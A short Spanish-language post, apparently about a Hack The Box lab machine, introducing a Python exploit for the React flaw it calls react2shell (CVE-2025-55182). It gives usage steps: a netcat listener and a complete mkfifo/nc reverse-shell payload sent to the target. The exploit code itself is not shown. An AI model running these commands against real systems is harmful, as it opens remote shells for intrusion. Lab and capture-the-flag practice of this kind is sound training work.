
Creé un simple exploit de react2shell CVE-2025-55182 en python
He creado un exploit simple en Python para react2shell CVE-2025-55182
USO
Guarda el script: Guarda el código anterior como exploit.py.
Actualiza los hosts: Asegúrate de que reactor.htb se resuelva a la IP objetivo en tu archivo /etc/hosts. echo "<TARGET_IP> reactor.htb" | sudo tee -a /etc/hosts
Inicia el listener: Abre una terminal para capturar la reverse shell. nc -lvnp 4444
Ejecuta el exploit: Ejecuta el script con un payload de reverse shell. python3 exploit.py http://reactor.htb:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f"
Reemplaza <YOUR_IP> con la dirección IP de tu tun0.